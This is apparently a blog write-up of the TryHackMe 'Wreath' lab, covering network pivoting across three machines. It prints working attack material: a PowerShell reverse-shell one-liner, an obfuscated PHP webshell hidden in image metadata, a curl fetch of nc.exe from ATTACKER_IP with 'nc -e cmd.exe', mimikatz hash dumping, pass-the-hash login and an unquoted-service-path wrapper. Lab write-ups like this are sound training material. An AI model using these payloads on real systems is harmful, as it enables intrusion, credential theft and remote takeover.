Wreath – TryHackMe

This is a write-up for tryhackme room wreath, which covering Pivoting through the network.

first take a not of available resources.

  • There are three machines on the network
  • There is at least one public facing webserver
  • There is a self-hosted git server somewhere on the network
  • The git server is internal, so Thomas may have pushed sensitive information into it
  • There is a PC running on the network that has antivirus installed, meaning we can hazard a guess that this is likely to be Windows
  • By the sounds of it this is likely to be the server variant of Windows, which might work in our favour
  • The (assumed) Windows PC cannot be accessed directly from the webserver
  • Public IP of Server


Start the nmap scan of target

nmap -sC -sV -oN initial -p 1-15000     OR

nmap -min-rate 300 -A -oN initial -p 1-15000

when we visit webpage hosted port getting error because it failed to resolve DNS.

So we need to IP address and domain name to our /etc/hosts file on LInux or C:\Windows\System32\drivers\etc\hosts on windows.

after we adding Refresh the page and we can see hosted page.

Now back to ports, as result we can see in port 10000 MiniServ named app is running look like its quite old, we can see it by version number, first thought is check for exploits.

CVE-2019-15107 – Remote Code Execution

webmin is vulnerable for this exploit. you can download updated exploited in here.

git clone

cd CVE-2019-15107 && pip3 install -r requirements.txt

chmod +x ./


after we get shell when we try to move to other directory we can’t so we need better shell. when you type “shell” command in that terminal it ask for some details enter those and listen the netcat we get the reverse shell.

Further enumeration and we find private SSH key laying around copy the key to PC and connect with SSH.


For pivoting through the network we need to create a Reverse proxy for that will be using sshuttle, command for connecting is.

sshuttle -r root@ --ssh-cmd "ssh -i id_rsa" -x

if connection is success it will notify like this.

Now to scan internal network we need to upload nmap to victim machine because it doesn’t have nmap install, we will uploading it with help of temporary python server.

sudo python3 -m http.server 80

now scan the internal network and save the result.

./nmap-Munaz -sn -oN scan-Munaz

Result show 4 IPs are up, but we need to exclude our IP and mention OpenVPN server IP

This leave us with 2 IPs which are.


Now we know other 2 machine IP, scan those IP separately result are,

One IP return filtered result and other shows open ports. for now we need to further enumerate the following IP (

When we goto Port 80 we get error, we need to add APP name to open the webpage correctly go add APP name followed by IP in browser.

It says default credential is admin/admin but its not work. so try searching common exploits.

to copy the execution file to your current directory type this command

searchsploit -m

edit the file and make some change to target IP and webshell name, before execute we need to convert that file from dos to unix because most payload saved in searchsploit are DOS line ending

dos2unix ./

after completing the all the work execute the file, if everything done correctly it give this output

command is executed it give “nt authority\system” this is equal to root user in linux, also check webshell is working. you can do that in 2 ways. Using Burpsuit or cURL command.

curl -X POST http://gitserver.thm/web/exploit-munaz.php -d "a=systeminfo"

Now we need the reverse shell from that server also before that we need to check this machine allowed to connect outside, we can do that with simple ping command.

#Listen for icmp pings in your machine

sudo tcpdump -i tun0 icmp

#then ping using webshell command

it failed we need to check for the reason, CentOS uses an always-on wrapper around the IPTables firewall called “firewalld”. By default, so we need to allows selected port to connect via reverse shell.

firewall-cmd --zone=public --add-port 20000/tcp

since this is windows machine we need powershell payload also we need to upload nc since that linux machine don’t have nc install in it. same as earlier upload nc binary using python server. check below payload.

powershell.exe -c "$client = New-Object System.Net.Sockets.TCPClient('',20000);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

Change the appropriate IP and Port then url encoded payload and inject this command. also start listener.

we have full access but when enumeration we saw RDP port is open if we create user with RDP access we can login using GUI.

net user munaz PASSWORD /add

net localgroup Administrators munaz /add

net localgroup "Remote Management Users" munaz /add

We have our own profile with Admin privilege, now we can login using RDP or winrm.

we will be connecting using RDP with windows exploits tool its made easy.

xfreerdp /v: /u:munaz /p:PASSWORD +clipboard /dynamic-resolution /drive:/usr/share/windows-resources,share

tool folder also shared, we can run mimikatz and dump credential. open cmd as administrator and run following command.

\\tsclient\share\mimikatz\x64\mimikatz.exe     #start mimikatz
privilege::debug #
token::elevate   #debug privilege and elevate to our intergrity to SYSTEM level

now local password hashes using this command.


copy the Administrator Hash we can use this with evil-winrm to login with hash, you can try to crack hash but it take a lot time no use when we can login with password hash.

evil-winrm -u Administrator -H HASH -i


We finally fully compromised the windows machine now time to move to next target, for enumerate we need to scan target for more details, we can try uploading nmap but t might be tricky since its exe file. in evil-winrm they provided tac S (-s) which let us enable a folder, using that command we can scan for more detials

evil-winrm -u Administrator -H HASH -i -s /opt/Empire/data/module_source/situational_awareness/network

finally use this command to scan internal ports.

Invoke-Portscan -Hosts -TopPorts 50

we can see the open ports in thomas personal PC now we need another Reverse Proxy connecting back to our PC then we can access thomas hosted page. to do that first need to create firewall rule and open a port then need to upload chisel which we be using to create proxy connection.

now create chisel server and client using this command

.\chisel-munaz.exe server -p 21000 --socks5      #On

chisel client 9090:socks     #On your own machine

now its connected, now you need to open another browser, use froxyproxy and setup proxy for port 9090. then goto IP address and you can see similar website we can earlier.

We saw same website in different places in different way that mean thomas using it to version control his project, if we can download the source code we might have what to do next. so check windows server for any GIT related files.

As suspected we found the file called Website.git, download the folder using winrm

that folder in raw format we cannot read, we need tool named GitTool you can download here.

clone the tool and run the tool.

git clone

cd GitTool/Extractor

./ ../../../Website.git ../../../website

cd ../../../website

you can find these directories in there.

those commit are not in order to find order enter this command on terminal and go through result.

separator="======================================="; for i in $(ls); do printf "\n\n$separator\n\033[4;1m$i\033[0m\n$(cat $i/commit-meta.txt)\n"; done; printf "\n\n$separator\n\n\n"

go through commit and we can see some have parent and some have don’t, commit which don’t have parent will be initial commit by sorting with that order will be.

  1. 70dde80cc19ec76704567996738894828f4ee895
  2. 82dfc97bec0d7582d485d9031c09abcb5c6b18f2
  3. 345ac8b236064b431fa43f53d91c98c4834ef8f3

look like “345ac8b236064b431fa43f53d91c98c4834ef8f3” this is the last commit, go into folder inside and check for any PHP files.

There is index.php file when we look into that, can notice it is file upload page. which checking for file extension and file size we can easily bypass it.

Goto file upload location it asking for login details, earlier we crack Thomas hash so high chance of using same password again. try same password with user name thomas. login sucess

first try uploading image, as expected its successful. now we need to find way to embed the payload in image.

We can use exiftool embed payload in image comments and upload it with changed name as .php.

    $cmd = $_GET["wreath"];
        echo "<pre>" . shell_exec($cmd) . "</pre>";

This is the payload we gonna embed before that we need to Obfuscation payload AV Evasion

You can use this online tool for PHP Obfuscation.

after Obfuscation after payload look like this.

<?php \$p0=\$_GET[base64_decode('d3JlYXRo')];if(isset(\$p0)){echo base64_decode('PHByZT4=').shell_exec(\$p0).base64_decode('PC9wcmU+');}die();?>

and use this command to embed the payload to image.

exiftool -Comment="<?php \$p0=\$_GET[base64_decode('d3JlYXRo')];if(isset(\$p0)){echo base64_decode('PHByZT4=').shell_exec(\$p0).base64_decode('PC9wcmU+');}die();?>" shell-Munaz.jpeg.php

Upload the payload

payload upload successful, now we run command on webpage.

now upload nc.exe to get shell,

sudo python3 -m http.server 80                    # our machine

curl http://ATTACKER_IP/nc.exe -o c:\\windows\\temp\\nc-Munaz.exe

powershell.exe c:\\windows\\temp\\nc-Munaz.exe IP 25500 -e cmd.exe # execute

Finally we have Reverse shell on our final machine, only thing left is PrivEsc, check for privilege groups and more.

Basic Enumeration Command

whoami /priv

whoami /groups

wmic service get name,displayname,pathname,startmode | findstr /v /i "C:\Windows"

look like “SystemExplorerHelpService” might be vulnerable to an Unquoted Service Path attack.

now need to check that service running under which account.


sc qc SystemExplorerHelpService

Lucky us its run as local system. now check the directory have write permission to us, and YES buildin users have full permission.

All we need to do now is create our own binary and replace it with vulnerable service. Create wrapper.

using System;
using System.Diagnostics;

namespace Wrapper{
    class Program{
        static void Main(){
            Process proc = new Process();
            ProcessStartInfo procInfo = new ProcessStartInfo("c:\\windows\\temp\\nc64-munaz.exe", " 26000 -e cmd.exe");
            procInfo.CreateNoWindow = true;
            proc.StartInfo = procInfo;

after editing the file, save and exit then run this command.

mcs wrapper.cs

it transfer wrapper to exe which we will be uploading to windows machine, to upload to machine we are going to use impacker smbserver.

created the server now need to connect to share.

copy the wrapper.exe file to machine, after that disconnect the share.

To disconnect from share use this command.

net use \\\share /del

since we copiyed the wrapper.exe now only to replace following path "C:\Program Files (x86)\System Explorer\" after that stop the service and start again also rember to start netcat listener

FInally we exploited thomas personal computer. YES we got root!!!

In Pentesting it’s good practice to clean all payload and all the changes made.


1. Firewall Rules in Prod Serv
2. Payload in Prod Serv
3. Firewall Rules in git-serv
4. Windows User Profile
5. nmap, nc.exe chisel.exe 
6. webshell payload
7. wrapper.exe 

Remebmer to Clean UP Guys, Happy Hacking!!!

I like to specially thank @darkstar7471 and @MuirlandOracle for awesome content, video tutorial and all support given to Cyber Securtiy Community.

Share this post